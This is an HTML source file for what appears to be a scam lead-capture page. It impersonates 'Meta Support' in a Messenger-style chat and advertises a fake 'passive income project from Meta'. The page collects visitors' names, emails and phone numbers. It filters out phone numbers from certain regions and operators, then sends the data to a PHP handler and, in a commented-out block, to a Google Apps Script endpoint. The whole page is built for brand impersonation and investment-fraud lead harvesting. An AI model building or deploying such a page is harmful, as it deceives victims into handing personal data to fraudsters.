<!DOCTYPE html>
<html lang="ru-RU">
	<head>

		<meta charset="utf-8" />

		<meta name="facebook-domain-verification" content>
		<meta name="robots" content="noindex, nofollow">

		<meta content="IE=edge" http-equiv="X-UA-Compatible">
		<meta content="width=device-width, initial-scale=1.0" name="viewport">
		<meta http-equiv="Cache-Control" content="no-cache">

		<title>
			Meta Support
		</title>

		<link rel="stylesheet" href="intl-tel-input/css/intlTelInput.css">
		<link href="intl-tel-input/css/intlTelInput.min.css">
		<link href="intl-tel-input/css/demo.css">

		<link href="css/intlTelInput.css" rel="stylesheet">
		<link rel="shortcut icon" href="favicon-1.ico" type="image/x-icon">
		<link href="css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">

		<link rel="stylesheet" href="css/leadForm.css">
		<link rel="stylesheet" href="css/main.css">
		<link rel="stylesheet" href="css/form.css">

		<link rel="preconnect" href="https://fonts.googleapis.com">
		<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
		<style>
        .countryFlag {
            background-repeat: no-repeat;
            background-position: 15% center;
            height: 100%;
        }
    </style>

		<script>
    var date = new Date();
    date.setTime(date.getTime() + (5 * 24 * 60 * 60 * 1000));
    if (!'{pixel}'.match('{')) {
      document.cookie = "pixel={pixel}; " + "expires=" + date.toUTCString() + "";
    }
    </script>

		<script>
    var matches = document.cookie.match(new RegExp("(?:^|; )" + 'pixel' + "=([^;]*)"));
    var pixel = matches ? decodeURIComponent(matches[1]) : undefined;
    </script>

		<!-- Facebook Pixel Code -->
		<script>
    !function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    n.callMethod.apply(n,arguments):n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', pixel);
    fbq('track', 'PageView');
    </script>
		<!-- End Facebook Pixel Code -->
	</head>

	<body class="add-scroll">
		<div class="body" style="transform: translateY(0px);">
			<div class="content">
				<div class="header">
					<div class="header__body">
						<div class="header__name">
							<div class="header__avatar">
								<img src="images/meta-avatar.png" alt>
							</div>
							<div class="header__desc">
								<div class="header__desc-title">
									<p>Meta Support</p>
									<img src="images/meta-done.png" alt>
								</div>
								<p class="header__desc-text">
									Messenger
								</p>
							</div>
						</div>
						<div class="header__modal">
							<button type="button" data-modal-close>
								<img src="images/btn-menu.png" alt>
							</button>
							<p>
								Чтобы связаться со специалистом, пройдите диалог до конца.
							</p>
						</div>
						<div class="header__icons">
							<button type="button" data-modal>
								<svg width="23" height="24" viewBox="0 0 23 24" fill="none" xmlns="http://www.w3.org/2000/svg">
									<path fill-rule="evenodd" clip-rule="evenodd"
										d="M9.37815 13.9919L9.5081 14.1218C11.7457 16.2882 13.6184 17.3056 15.1261 17.174L15.5605 16.7687C16.1785 16.2064 16.6444 15.85 16.9584 15.6994C17.612 15.3859 18.0707 15.3922 19.3094 16.0625C20.939 16.9442 22.0642 17.9691 22.6392 18.5441C23.1731 19.078 23.0072 19.9977 22.8197 20.4057L22.6955 20.6333C22.3619 21.2129 21.1521 23.1249 18.8334 23.4521C17.9523 23.5764 16.8399 23.4624 15.5357 23.0696C12.7419 22.1024 9.95981 20.3297 7.18932 17.7514L6.69661 17.2834L6.69197 17.288L6.45419 17.046L6.21199 16.808L6.21664 16.8034L5.74857 16.3107C3.17035 13.5402 1.39763 10.7581 0.430416 7.96428C0.0376067 6.66006 -0.0763732 5.54772 0.047946 4.66655C0.39822 2.18383 2.56566 0.972407 2.96871 0.746715L3.00964 0.723616C3.35849 0.522447 4.38095 0.285854 4.95591 0.860816L5.22814 1.14078C5.82079 1.76756 6.68177 2.79378 7.43755 4.19059C8.1078 5.42934 8.11405 5.88801 7.80058 6.54161C7.61655 6.92534 7.125 7.53612 6.32595 8.37394C6.19439 9.88161 7.21179 11.7543 9.37815 13.9919Z"
										fill="#0584FE" />
								</svg>
							</button>
							<div style="cursor: pointer;">
								<svg width="28" height="18" viewBox="0 0 28 18" fill="none" xmlns="http://www.w3.org/2000/svg">
									<path fill-rule="evenodd" clip-rule="evenodd"
										d="M15.7 0C17.7987 0 19.5 1.7269 19.5 3.85714V14.1429C19.5 16.2731 17.7987 18 15.7 18H4.3C2.20132 18 0.5 16.2731 0.5 14.1429V3.85714C0.5 1.7269 2.20132 0 4.3 0H15.7ZM27.3658 4.02231C27.4538 4.17312 27.5 4.34278 27.5 4.5153V13.4849C27.5 14.0455 27.0224 14.5 26.4333 14.5C26.2521 14.5 26.0738 14.456 25.9153 14.3723L22.1858 12.4005C21.7625 12.1767 21.5 11.7521 21.5 11.2912V6.70894C21.5 6.24812 21.7625 5.82352 22.1858 5.59973L25.9153 3.62793C26.4303 3.35566 27.0797 3.53224 27.3658 4.02231Z"
										fill="#D2D2D2" />
								</svg>
							</div>
						</div>
					</div>
				</div>
				<form class="register-form main-flex" id="myForm" method="POST" action="order.php">
					<input name="ip" type="hidden" value>
					<input type="hidden" name="country" value>
					<input type="hidden" name="_subid" value="{subid}" />
					<input type="hidden" name="subid" value="{subid}" />
					<input type="hidden" name="utm_medium" value="{utm_medium}" />
					<input type="hidden" name="source" value="{source}" />
					<input type="hidden" id="phonecode" name="code" />
					<input type="hidden" name="campaignname" value="{campaignname}" />
					<input type="hidden" name="adname" value="{adname}" />
					<div class="chat">
						<div class="chat-absolute">
							<div class="main__sup-logo">
								<img src="images/meta-logo.png" alt>
							</div>
							<div class="main__sup-subtitle">
								Official support for users of the passive income project from “Meta”
							</div>
							<p class="message-time">

							</p>
						</div>
						<div class="chat-content-list chat-content-list-1"></div>
						<div class="user--name">
							<div class="form-input-main">
								<input type="text" class="form-input" name="first_name" placeholder="Name" required>
							</div>
							<div class="form-input-main">
								<input type="text" class="form-input" name="last_name" placeholder="Last name" required>
							</div>
							<button type="button" class="button--user button-name-next" data-btn-name>Next</button>
						</div>
						<div class="chat-content-list chat-content-list-2"></div>
						<div class="user--email">
							<div class="form-input-main">
								<input type="email" name="email" placeholder="E-mail" required>
							</div>
							<button type="button" class="button--user button-email-next" data-btn-email>Next</button>
						</div>
						<div class="chat-content-list chat-content-list-3"></div>
						<div class="user--phone">
							<div class="form-input-main">
								<div class="commonInputDiv">
									<div class="input-group mb-3">
										<input id="phone" name="phone_number" type="tel" required>
									</div>
								</div>
							</div>

							<button type="button" class="button--user button-phone-next" data-btn-phone>Next</button>
						</div>
						<div class="chat-content-list chat-content-list-4"></div>
						<div class="form--button hide">
							<input name="submitBtn" type="submit" value="Приступить">
						</div>
						<div id="down-box"></div>
					</div>
					<div class="main__sup">
						<div class="main__sup-logo">
							<img src="images/meta-logo.png" alt>
						</div>
						<div class="main__sup-title">
							<p>
								Meta Support
							</p>
							<img src="images/meta-done.png" alt>
						</div>
						<div class="main__sup-subtitle">
							Official support for users of the passive income project from “Meta”
						</div>
						<div class="main__sup-btn">
							<p>
								Contact a specialist
							</p>
							<img src="images/meta-arrow.png" alt>
						</div>
						<p class="meta__sup-text">
							To start using the program you need to finish the dialogue with us! It won't take you long
							more than 5 minutes. Trust us, the benefits you will get are worth it.
						</p>
					</div>
				</form>
			</div>
		</div>

		<!-- jquery -->
		<script src="js/jquery.min-1.js"></script>
		<script src="js/main.js"></script>
		<script src="js/mycust.js"></script>

		<!-- intlTelInput -->
		<link rel="stylesheet" href="css/intlTelInput.min-1.css">
		<script src="js/intlTelInput.min-1.js"></script>

		<style>
    .error {
        background-color: rgba(255, 0, 0, 0.5) !important;
        color: #fff !important;
    }

    .error::placeholder {
        color: #fff !important;
    }

    .valid {
        background-color: rgba(0, 255, 0, 0.5) !important;
    }

    .modal_phone {
        opacity: 1;
        position: fixed;
        top: 0;
        bottom: 0;
        right: 0;
        left: 0;
        z-index: 99999;
        display: none;
        outline: 0;
        padding-right: 15px;
        justify-content: center;
        align-items: center;
        background-color: rgba(0, 0, 0, 0.4);
        overflow-x: hidden;
        overflow-y: auto;
        color: #000;
    }

    .modal_phone.open_phone {
        display: flex;
    }

    .modal-open_phone {
        overflow: hidden;
    }

    .modal-dialog_phone {
        position: relative;
        width: 100%;
        max-width: 32rem;
        padding: 1rem;
        box-sizing: border-box;
    }

    .modal-content_phone {
        display: flex;
        flex-direction: column;
        pointer-events: auto;
        background-color: #fff;
        background-clip: padding-box;
        border: 1px solid rgba(0, 0, 0, 0.2);
        border-radius: 0.3rem;
        outline: 0;
    }

    .modal-header_phone {
        display: flex;
        align-items: center;
        padding: 1rem 1rem;
    }

    .modal-header_phone {
        justify-content: space-between;
        border-top-left-radius: 0.3rem;
        border-top-right-radius: 0.3rem;
    }

    .modal-body_phone {
        position: relative;
        flex: 1 1 auto;
        padding: 1rem;
    }

    .modal-title_phone {
        font-size: 1.25rem;
        font-weight: 600;
    }

    .close-button_phone {
        font-size: 1.5rem;
        font-weight: 700;
        line-height: 1;
        opacity: 0.5;
        background-color: transparent;
        border: 0;
        cursor: pointer;
        padding: 1rem 1rem;
        margin: -1rem -1rem -1rem auto;
    }
</style>

		<div id="modal_phone" class="modal_phone fade_phone" tabindex="-1">
			<div class="modal-dialog_phone">
				<div class="modal-content_phone">
					<div class="modal-header_phone">
						<h5 class="modal-title_phone">
							Неверный номер телефона
						</h5>
						<button type="button" class="close-button_phone" id="close-button_phone">×</button>
					</div>
					<div class="modal-body_phone">
						Извините! Программа не поддерживается в вашем регионе. Пожалуйста, введите свой европейский номер
					</div>
				</div>
			</div>
		</div>

		<script src="js/jquery.min.js"></script>
		<script src="js/intlTelInput.js"></script>
		<script src="js/jquery.mask.js"></script>
		<script src="js/jquery.validate.min.js"></script>
		<script src="js/NationalDestination.js"></script>

		<script type="text/javascript">
    function ValidateForm() {
        var isValid = $("#regform").valid(); // Проверяем валидацию формы с помощью validate.min.js
        if (isValid) {
            document.getElementById('btn').disabled = true
        }
        return isValid; // Если isValid равно true, форма будет отправлена, иначе отправка будет отменена
    }

    // function ValidateForm() {
    //   document.getElementById('btn').disabled = true
    // }

    // //Валидация имени
    // jQuery.validator.addMethod("firstname", function(value, element) {
    //     if (/^[A-Za-zА-Яа-яЁё]+$/.test(value)) {
    //         return true;
    //     } else {
    //         return false;
    //     };
    // }, 'Имя должно содержать только буквы');

    // //Валидация фамилии
    // jQuery.validator.addMethod("lastname", function(value, element) {
    //     if (/^[A-Za-zА-Яа-яЁё]+$/.test(value)) {
    //         return true;
    //     } else {
    //         return false;
    //     }
    // }, 'Фамилия должна содержать только буквы');

    $(document).ready(function () {
        $("#regform").validate({
            rules: {
                fname: {
                    required: true,
                    minlength: 1
                },
                lname: {
                    required: true,
                    minlength: 1
                },
                email: {
                    required: true,
                    email: true
                },
                phone_number: {
                    required: true,
                }
            },
            messages: {
                fname: {
                    required: "Введите имя",
                    minlength: "Минимальная длина имени должна быть не менее {0} символов"
                },
                lname: {
                    required: "Введите фамилию",
                    minlength: "Минимальная длина фамилии должна быть не менее {0} символов"
                },
                email: {
                    required: "Введите адрес электронной почты",
                    email: "Введите корректный адрес электронной почты"
                },
                phone_number: {
                    required: "Введите корректный номер телефона"
                }
            }
        });

        const button = document.querySelector("#btn");
        const errorMsg = document.querySelector("#error-msg");
        const validMsg = document.querySelector("#valid-msg");

        // here, the index maps to the error code returned from getValidationError - see readme
        const errorMap = ["Некорректный номер телефона", "Некорректный код страны", "Слишком короткий номер", "Слишком длинный номер", "Неправильный номер телефона"];

        var phoneInputID = "#phone";
        var input = document.querySelector(phoneInputID);
        // var iti = window.intlTelInput(input, {
        //     initialCountry: "auto",
        //     nationalMode: true,
        //     autoPlaceholder: 'aggressive',
        //     formatOnDisplay: true,
        //     geoIpLookup: function (callback) {
        //         $.get("http://ipinfo.io", function () {
        //         }, "jsonp").always(function (resp) {
        //             var countryCode = (resp && resp.country) ? resp.country : "";
        //             callback(countryCode);
        //         });
        //     },
        //     hiddenInput: "phone_number",
        //     //initialCountry: "auto",
        //     // localizedCountries: { 'de': 'Deutschland' },
        //     // nationalMode: false,
        //     // placeholderNumberType: "MOBILE",
        //     utilsScript: "https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/11.0.14/js/utils.js"
        // });

        $(phoneInputID).on("countrychange", function (event) {


            var selectedCountryData = iti.getSelectedCountryData();
            newPlaceholder = intlTelInputUtils.getExampleNumber(selectedCountryData.iso2, true, intlTelInputUtils.numberFormat.INTERNATIONAL),
                iti.setNumber("");
            mask = newPlaceholder.replace(/[1-9]/g, "0");
            $(this).mask(mask);
        });

        iti.promise.then(function () {
            $(phoneInputID).trigger("countrychange");
        });


        const reset = () => {
            input.classList.remove("error");
            errorMsg.innerHTML = "";
            errorMsg.classList.add("hide");
            validMsg.classList.add("hide");
        };

        // on click button: validate
        button.addEventListener('click', () => {
            reset();
            if (input.value.trim()) {
                if (iti.isValidNumber()) {
                    let PhoneNationalDestination = document.getElementById('phone').value;
                    PhoneNationalDestination = PhoneNationalDestination.replace(/\s+/g, '');
                    PhoneNationalDestination = PhoneNationalDestination.substring(0, 3);

                    // PhoneNationalDestinationMass сравнение с заблокироваными кодами операторов

                    if (PhoneNationalDestinationMass.includes(PhoneNationalDestination)) {
                        document.getElementById('phone').value = '';
                        event.preventDefault(); // Отменяем отправку формы по умолчанию
                        errorMsg.innerHTML = "Некорректный номер телефона";
                        errorMsg.classList.remove("hide");
                    } else {
                        // console.log("Значение не найдено в массиве.");
                        // validMsg.classList.remove("hide");
                    }

                } else {
                    input.classList.add("error");
                    const errorCode = iti.getValidationError();
                    errorMsg.innerHTML = errorMap[errorCode];
                    errorMsg.classList.remove("hide");
                    event.preventDefault(); // Отменяем отправку формы по умолчанию
                }
            }
        });

        // on keyup / change flag: reset
        input.addEventListener('change', reset);
        input.addEventListener('keyup', reset);

    });
    setInterval(() => {
        let phone_code = document.getElementsByClassName('iti__selected-dial-code')[0].innerHTML;
        document = document.getElementById('phonecode').value = phone_code;
    }, 100)
</script>

		<script src="js/popper.min.js"></script>
		<script src="js/bootstrap.min.js" crossorigin="anonymous"></script>
		<script src="js/popper.min.js" crossorigin="anonymous"></script>
		<script src="intl-tel-input/js/intlTelInput.js"></script>
		<script src="intl-tel-input/js/utils.js"></script>
		<script>
    var input = document.querySelector("#phone");
    window.intlTelInput(input, {
        hiddenInput: "full",
        autoHideDialCode: "true",
        autoPlaceholder: "aggressive",
        placeholderNumberType: "MOBILE",
        separateDialCode: "false",
        initialCountry: "auto",
        geoIpLookup: (callback) => {
            fetch("https://ipapi.co/json")
                .then((res) => res.json())
                .then((data) => callback(data.country_code))
                .catch(() => callback("us"));
        },
        utilsScript: "intl-tel-input/js/utils.js",
    });
</script>
		<script>
	document.getElementById('myForm').addEventListener('submit', function(event) {
  event.preventDefault(); // Предотвращаем стандартное поведение отправки формы
   var formData = new FormData(document.getElementById("myForm"));
formData.append('country'  , document.querySelector('.iti__selected-flag').title)
sendFormToGoogleSheets(formData)
	location.href = 'thanks.html'
	 
	})
	async function sendFormToGoogleSheets(formTwo) {

		 let response = await fetch('sendform.php', {
		method: 'POST',
		body: formTwo

	})
	} 


	
</script>
	</body>
</html>
<!-- document.getElementById('myForm').addEventListener('submit', function(event) {
  event.preventDefault(); // Предотвращаем стандартное поведение отправки формы

  var formData = new FormData(this); // Получаем данные из формы
  var xhr = new XMLHttpRequest(); // Создаем XMLHttpRequest-объект

  // Открываем POST-запрос к серверу Google Apps Script
  xhr.open('POST', 'https://script.google.com/macros/s/1gZSVgRIm0LKevbLRNVlBjJUUVPX6_kJy9CtacALGV3ET-JrNZbkG3rwG/exec', true);

  // Отправляем данные формы в формате URL-кодирования
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

  xhr.onload = function() {
    if (xhr.status === 200) {
      console.log('Данные успешно отправлены');
      // Добавьте код, который вы хотите выполнить после успешной отправки данных
    } else {
      console.error('Произошла ошибка при отправке данных');
      // Добавьте код, который вы хотите выполнить в случае ошибки
    }
  };

  // Отправляем данные формы на сервер
  xhr.send(new URLSearchParams(formData));
}); -->